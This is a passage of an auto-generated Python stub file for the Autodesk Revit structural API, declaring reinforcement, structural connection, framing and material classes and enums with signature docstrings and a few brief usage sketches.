lambda self, v: None, lambda self: None) # default """Use this option to modify the way varying length bars are numbered (individually or as a whole). Get: NumberVaryingLengthRebarsIndividually(self: ReinforcementSettings) -> bool Set: NumberVaryingLengthRebarsIndividually(self: ReinforcementSettings) = value """ RebarPresentationInSection = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The default presentation mode for rebar sets, when: The view direction is perpendicular to the rebar normal and the rebar set is cut.The view direction is not perpendicular to the rebar normal and the view direction is not parallel to the rebar normal. 
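# --- Illustrative usage sketch (not part of the generated stub) --------------
# Reading and writing abbreviation tags through the project-wide settings
# element. The "T1" value is an arbitrary example and a Transaction is assumed
# to be open on `doc`.
def _example_abbreviation_tags(doc):
    settings = ReinforcementSettings.GetReinforcementSettings(doc)
    settings.SetReinforcementAbbreviationTag(
        ReinforcementAbbreviationTagType.AreaReinforcementTopMajor, "T1")
    # All abbreviations currently defined for Area Reinforcement objects.
    return settings.GetReinforcementAbbreviationTags(
        ReinforcementAbbreviationObjectType.Area)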
Get: RebarPresentationInSection(self: ReinforcementSettings) -> RebarPresentationMode Set: RebarPresentationInSection(self: ReinforcementSettings) = value """ RebarPresentationInView = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The default presentation mode for rebar sets, when the view direction is perpendicular to the rebar normal and the rebar set is not cut. Get: RebarPresentationInView(self: ReinforcementSettings) -> RebarPresentationMode Set: RebarPresentationInView(self: ReinforcementSettings) = value """ RebarShapeDefinesEndTreatments = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """End Treatments are defined by Rebar Shape of Rebar element. Can be changed if document contains no rebars, area reinforcements and path reinforcements. Get: RebarShapeDefinesEndTreatments(self: ReinforcementSettings) -> bool Set: RebarShapeDefinesEndTreatments(self: ReinforcementSettings) = value """ RebarShapeDefinesHooks = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Hooks are defined by Rebar Shape of Rebar element. Can be changed if document contains no rebars, area reinforcements and path reinforcements. Get: RebarShapeDefinesHooks(self: ReinforcementSettings) -> bool Set: RebarShapeDefinesHooks(self: ReinforcementSettings) = value """ RebarVaryingLengthNumberSuffix = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """A unique identifier used for a bar within a variable length rebar set. Get: RebarVaryingLengthNumberSuffix(self: ReinforcementSettings) -> str Set: RebarVaryingLengthNumberSuffix(self: ReinforcementSettings) = value """ class ReleaseType(Enum, IComparable, IFormattable, IConvertible): """ The release type. enum ReleaseType, values: BendingMoment (2), Fixed (0), Pinned (1), UserDefined (3) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass BendingMoment = None Fixed = None Pinned = None UserDefined = None value__ = None class StickElementExtension(Enum, IComparable, IFormattable, IConvertible): """ Presets for given Analytical Extension. enum StickElementExtension, values: BottomOrTop (0), Plane (2), ReferenceLevel (1), Varies (3) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) 
initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass BottomOrTop = None Plane = None ReferenceLevel = None value__ = None Varies = None class StickElementProjectionY(Enum, IComparable, IFormattable, IConvertible): """ Presets for given Analytical Projection. enum StickElementProjectionY, values: Center (2), Left (1), LocationLine (0), Plane (4), Right (3), Varies (5) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Center = None Left = None LocationLine = None Plane = None Right = None value__ = None Varies = None class StickElementProjectionZ(Enum, IComparable, IFormattable, IConvertible): """ Presets for given Analytical Projection. enum StickElementProjectionZ, values: Bottom (3), Center (2), LocationLine (0), Plane (4), Top (1), Varies (5) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Bottom = None Center = None LocationLine = None Plane = None Top = None value__ = None Varies = None class StirrupTieAttachmentType(Enum, IComparable, IFormattable, IConvertible): """ An enumerated tye that represents how the Stirrup/Tie rebar is attached to the cover reference. 
enum StirrupTieAttachmentType, values: ExteriorFace (1), InteriorFace (0) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass ExteriorFace = None InteriorFace = None value__ = None class StructuralConnectionApplyTo(Enum, IComparable, IFormattable, IConvertible): """ An enumerated type that represents the type of structural locations to which a connection annotation may be applied. enum StructuralConnectionApplyTo, values: BeamsAndBraces (0), ColumnBase (2), ColumnTop (1), Connection (3) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass BeamsAndBraces = None ColumnBase = None ColumnTop = None Connection = None value__ = None class StructuralConnectionApprovalType(ElementType, IDisposable): """ A type element that represents a connection approval type. """ @staticmethod def Create(doc, name): """ Create(doc: Document, name: str) -> StructuralConnectionApprovalType Creates a new StructuralConnectionApprovalType. name: A name for the new approval type. It must be unique within the document. Returns: Created connection approval type. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass @staticmethod def GetAllStructuralConnectionApprovalTypes(cda, ids): """ GetAllStructuralConnectionApprovalTypes(cda: Document) -> ICollection[ElementId] """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass @staticmethod def IsValidApprovalTypeName(doc, name): """ IsValidApprovalTypeName(doc: Document, name: str) -> bool Verifies if the provided approval name is unique in the document. Returns: True if approval type name is unique. 
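        Example (illustrative sketch, not part of the generated stub; assumes an open
        Document 'doc' and an active Transaction; the approval name is arbitrary):

            name = "Site approval"
            if StructuralConnectionApprovalType.IsValidApprovalTypeName(doc, name):
                approval = StructuralConnectionApprovalType.Create(doc, name)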
""" pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass class StructuralConnectionCodeCheckingStatus(Enum, IComparable, IFormattable, IConvertible): """ An enumerated type listing all code checking status of the structural connection element. enum StructuralConnectionCodeCheckingStatus, values: CheckingFailed (2), NotCalculated (0), OkChecked (1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass CheckingFailed = None NotCalculated = None OkChecked = None value__ = None class StructuralConnectionHandler(Element, IDisposable): """ An object of Structural Connection Handler. """ def AddElementIds(self, elemIds): """ AddElementIds(self: StructuralConnectionHandler, elemIds: IList[ElementId]) """ pass @staticmethod def Create(document, idsToConnect, typeId=None): """ Create(document: Document, idsToConnect: IList[ElementId]) -> StructuralConnectionHandler Create(document: Document, idsToConnect: IList[ElementId], typeId: ElementId) -> StructuralConnectionHandler """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetConnectedElementIds(self): """ GetConnectedElementIds(self: StructuralConnectionHandler) -> IList[ElementId] Retrieves list of element ids of connected elements. Returns: Returns connected element ids. """ pass def GetOrigin(self): """ GetOrigin(self: StructuralConnectionHandler) -> XYZ Retrieves origin point of Structural Connection Handler element. Returns: The origin point of element. """ pass def IsDetailed(self): """ IsDetailed(self: StructuralConnectionHandler) -> bool Checks if Structural Connection Handler has the detailed connection style. Returns: True if Structural Connection Handler has the detailed connection style. 
""" pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def RemoveElementIds(self, elemIds): """ RemoveElementIds(self: StructuralConnectionHandler, elemIds: IList[ElementId]) """ pass def SetDefaultPrimaryElement(self): """ SetDefaultPrimaryElement(self: StructuralConnectionHandler) Sets primary element in connection according to structural categories, element materials and geometries. The steel element is set rather than an element of other material. The priorities of the elements are set according structural categories in following order: columns, framings, walls, foundations, floors. In case of several Structural Framing elements order is determined by cutting - the cutting element is set as the primary one rather than element being cut. """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass ApprovalTypeId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Retrieves or changes approval type of the Structural Connection Handler. Get: ApprovalTypeId(self: StructuralConnectionHandler) -> ElementId Set: ApprovalTypeId(self: StructuralConnectionHandler) = value """ CodeCheckingStatus = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Code checking status of the structural connection. Get: CodeCheckingStatus(self: StructuralConnectionHandler) -> StructuralConnectionCodeCheckingStatus Set: CodeCheckingStatus(self: StructuralConnectionHandler) = value """ SingleElementEndIndex = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Element end index for single element connections (0: start, 1: end). Get: SingleElementEndIndex(self: StructuralConnectionHandler) -> int Set: SingleElementEndIndex(self: StructuralConnectionHandler) = value """ class StructuralConnectionHandlerType(ElementType, IDisposable): """ A StructuralConnectionHandlerType is used in StructuralConnectionHandler element generation. """ @staticmethod def Create(pADoc, name, guid, familyName): """ Create(pADoc: Document, name: str, guid: Guid, familyName: str) -> StructuralConnectionHandlerType Creates a new StructuralConnectionHandlerType object. pADoc: The document. name: The type name. guid: Connection GUID. familyName: Name of system family which created type will belong to. Returns: The newly created instance. """ pass @staticmethod def CreateDefaultStructuralConnectionHandlerType(pADoc): """ CreateDefaultStructuralConnectionHandlerType(pADoc: Document) -> ElementId Creates a new StructuralConnectionHandlerType object with a default name. pADoc: The document. Returns: The newly created type id. 
""" pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass @staticmethod def GetDefaultConnectionHandlerType(pADoc): """ GetDefaultConnectionHandlerType(pADoc: Document) -> ElementId Gets a default type id for Structural Connection. pADoc: The document. Returns: The type id. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass ConnectionGuid = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The GUID to use for identifying connection geometry generation algorithm. Get: ConnectionGuid(self: StructuralConnectionHandlerType) -> Guid """ class StructuralConnectionSettings(Element, IDisposable): """ Provides access to project-wide structural connections settings. """ def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass @staticmethod def GetStructuralConnectionSettings(document): """ GetStructuralConnectionSettings(document: Document) -> StructuralConnectionSettings Obtains the StructuralConnectionSettings object for the specified project document. document: A project document. Returns: The StructuralConnectionSettings object. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass IncludeWarningControls = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """This property controls how Structural Connection Element is generated. If set to true and warnings are reported for given Element, additional yellow triangle is displayed. Get: IncludeWarningControls(self: StructuralConnectionSettings) -> bool Set: IncludeWarningControls(self: StructuralConnectionSettings) = value """ class StructuralConnectionType(ElementType, IDisposable): """ A type element that represents a connection symbol applied to structural members. 
""" @staticmethod def Create(doc, applyTo, name, familySymbolId): """ Create(doc: Document, applyTo: StructuralConnectionApplyTo, name: str, familySymbolId: ElementId) -> StructuralConnectionType Create a new StructuralConnectionType, allowing the specified annotation FamilySymbol to be applied to structural members. applyTo: Specify which type of member this connection type can be applied to. name: A name for the connection type. It must be unique within the document. familySymbolId: The id of an annotation FamilySymbol. InvalidElementId is allowed. Otherwise, the FamilySymbol must be in the category "Connection Symbols" (OST_StructConnectionSymbols) and have its "Apply To" parameter set to match the applyTo argument. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass @staticmethod def GetAllStructuralConnectionTypeIds(cda, ids): """ GetAllStructuralConnectionTypeIds(cda: Document) -> ICollection[ElementId] """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetFamilySymbolId(self): """ GetFamilySymbolId(self: StructuralConnectionType) -> ElementId FamilySymbol of the annotation to use for this connection type. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def SetFamilySymbolId(self, familySymbolId): """ SetFamilySymbolId(self: StructuralConnectionType, familySymbolId: ElementId) FamilySymbol of the annotation to use for this connection type. """ pass @staticmethod def ValidFamilySymbolId(doc, applyTo, familySymbolId): """ ValidFamilySymbolId(doc: Document, applyTo: StructuralConnectionApplyTo, familySymbolId: ElementId) -> bool Checks whether the family symbol id is allowed for StructuralConnectionTypes with the given value for the applyTo property. Returns: True if %familySymbolId% is invalidElementId; or if it is the id of a FamilySymbol of category "Connection Symbols" (OST_StructConnectionSymbols) with its "Apply To" parameter set to match the applyTo property. Returns false otherwise. """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass ApplyTo = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Choose whether this connection type applies to beams and braces, to tops of columns, or to bases of columns. Get: ApplyTo(self: StructuralConnectionType) -> StructuralConnectionApplyTo """ class StructuralFramingUtils(object): """ A collection of Structural Framing Utilities. """ @staticmethod def AllowJoinAtEnd(familyInstance, end): """ AllowJoinAtEnd(familyInstance: FamilyInstance, end: int) Sets the indicated end of the framing element to be allowed to join to others. familyInstance: The FamilyInstance, which must be of a structural framing category. end: The index of the end (0 for the start, 1 for the end). 
""" pass @staticmethod def CanFlipEnds(familyInstance): """ CanFlipEnds(familyInstance: FamilyInstance) -> bool Determines if the ends of the given framing element can be flipped. familyInstance: The FamilyInstance, which must be of a structural framing category, non-concrete. Returns: True for non-concrete line, arc or ellipse framing element, false otherwise. """ pass @staticmethod def CanSetEndReference(familyInstance, end): """ CanSetEndReference(familyInstance: FamilyInstance, end: int) -> bool Determines if a reference can be set for the given end of the framing element. familyInstance: The FamilyInstance, which must be of a structural framing category, non-concrete and joined at the given end. end: The index of the end (0 for the start, 1 for the end). Returns: True if reference can be set for the given end of the framing element. """ pass @staticmethod def DisallowJoinAtEnd(familyInstance, end): """ DisallowJoinAtEnd(familyInstance: FamilyInstance, end: int) Sets the indicated end of the framing element to not be allowed to join to others. familyInstance: The FamilyInstance, which must be of a structural framing category. end: The index of the end (0 for the start, 1 for the end). """ pass @staticmethod def FlipEnds(familyInstance): """ FlipEnds(familyInstance: FamilyInstance) Flips the ends of the structural framing element. familyInstance: The FamilyInstance, which must be of a structural framing category, non-concrete. """ pass @staticmethod def GetEndReference(familyInstance, end): """ GetEndReference(familyInstance: FamilyInstance, end: int) -> Reference Returns a reference to the end of a framing element according to the setback settings. familyInstance: The FamilyInstance, which must be of a structural framing category, non-concrete and joined. end: The index of the end (0 for the start, 1 for the end). Returns: The end reference. """ pass @staticmethod def IsEndReferenceValid(familyInstance, end, pick): """ IsEndReferenceValid(familyInstance: FamilyInstance, end: int, pick: Reference) -> bool Determines if the given reference can be set for the given end of the framing element. familyInstance: The FamilyInstance, which must be of a structural framing category, non-concrete and joined at the given end. end: The index of the end (0 for the start, 1 for the end). pick: The reference to be checked against the given end of the framing element. Returns: True if the given reference can be set for the given end of the framing element. """ pass @staticmethod def IsJoinAllowedAtEnd(familyInstance, end): """ IsJoinAllowedAtEnd(familyInstance: FamilyInstance, end: int) -> bool Identifies if the indicated end of the framing element is allowed to join to others. familyInstance: The FamilyInstance, which must be of a structural framing category. end: The index of the end (0 for the start, 1 for the end). Returns: True if it is allowed to join. False if it is disallowed. """ pass @staticmethod def RemoveEndReference(familyInstance, end): """ RemoveEndReference(familyInstance: FamilyInstance, end: int) Resets the end reference of the structural framing element. familyInstance: The FamilyInstance, which must be of a structural framing category, non-concrete and joined. end: The index of the end (0 for the start, 1 for the end). """ pass @staticmethod def SetEndReference(familyInstance, end, pick): """ SetEndReference(familyInstance: FamilyInstance, end: int, pick: Reference) Sets the end reference of a framing element. 
familyInstance: The FamilyInstance, which must be of a structural framing category, non-concrete and joined. end: The index of the end (0 for the start, 1 for the end). pick: The reference to set to the given end. """ pass __all__ = [ 'AllowJoinAtEnd', 'CanFlipEnds', 'CanSetEndReference', 'DisallowJoinAtEnd', 'FlipEnds', 'GetEndReference', 'IsEndReferenceValid', 'IsJoinAllowedAtEnd', 'RemoveEndReference', 'SetEndReference', ] class StructuralInstanceUsage(Enum, IComparable, IFormattable, IConvertible): """ Represents the structural usage of a family instance. enum StructuralInstanceUsage, values: Automatic (10), Brace (7), Column (2), Girder (3), HorizontalBracing (8), Joist (4), KickerBracing (9), Other (6), Purlin (5), TrussChord (11), TrussWeb (12), Undefined (0), Wall (1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Automatic = None Brace = None Column = None Girder = None HorizontalBracing = None Joist = None KickerBracing = None Other = None Purlin = None TrussChord = None TrussWeb = None Undefined = None value__ = None Wall = None class StructuralInstanceUsageFilter(ElementSlowFilter, IDisposable): """ A filter used to find elements that are structural family instances (typically columns, beams or braces) of the given structural usage. StructuralInstanceUsageFilter(structuralUsage: StructuralInstanceUsage, inverted: bool) StructuralInstanceUsageFilter(structuralUsage: StructuralInstanceUsage) """ def Dispose(self): """ Dispose(self: ElementFilter, A_0: bool) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: ElementFilter, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, structuralUsage, inverted=None): """ __new__(cls: type, structuralUsage: StructuralInstanceUsage, inverted: bool) __new__(cls: type, structuralUsage: StructuralInstanceUsage) """ pass StructuralUsage = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The family instance structural usage. 
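    Example (illustrative sketch, not part of the generated stub; assumes an open
    Document 'doc' and the standard FilteredElementCollector class):

        column_filter = StructuralInstanceUsageFilter(StructuralInstanceUsage.Column)
        ids = FilteredElementCollector(doc).WherePasses(column_filter).ToElementIds()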
Get: StructuralUsage(self: StructuralInstanceUsageFilter) -> StructuralInstanceUsage """ class StructuralMaterialType(Enum, IComparable, IFormattable, IConvertible): """ Represents the structural material type. This enum value is returned by Autodesk::Revit::DB::FamilyInstance::StructuralMaterialType. enum StructuralMaterialType, values: Aluminum (7), Concrete (2), Generic (6), Other (4), PrecastConcrete (5), Steel (1), Undefined (0), Wood (3) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Aluminum = None Concrete = None Generic = None Other = None PrecastConcrete = None Steel = None Undefined = None value__ = None Wood = None class StructuralMaterialTypeFilter(ElementSlowFilter, IDisposable): """ A filter used to match family instances that have the given structural material type. StructuralMaterialTypeFilter(structuralMaterialType: StructuralMaterialType, inverted: bool) StructuralMaterialTypeFilter(structuralMaterialType: StructuralMaterialType) """ def Dispose(self): """ Dispose(self: ElementFilter, A_0: bool) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: ElementFilter, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, structuralMaterialType, inverted=None): """ __new__(cls: type, structuralMaterialType: StructuralMaterialType, inverted: bool) __new__(cls: type, structuralMaterialType: StructuralMaterialType) """ pass StructuralMaterialType = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The structural material type. Get: StructuralMaterialType(self: StructuralMaterialTypeFilter) -> StructuralMaterialType """ class StructuralSectionsServiceData(object, IDisposable): """ The data needed by section type server to perform type definition. StructuralSectionsServiceData(document: Document, currentElementIds: IList[ElementId]) """ def Dispose(self): """ Dispose(self: StructuralSectionsServiceData) """ pass def GetCurrentElements(self): """ GetCurrentElements(self: StructuralSectionsServiceData) -> IList[ElementId] Returns the list of Ids of the current elements. Returns: Ids of the current elements. 
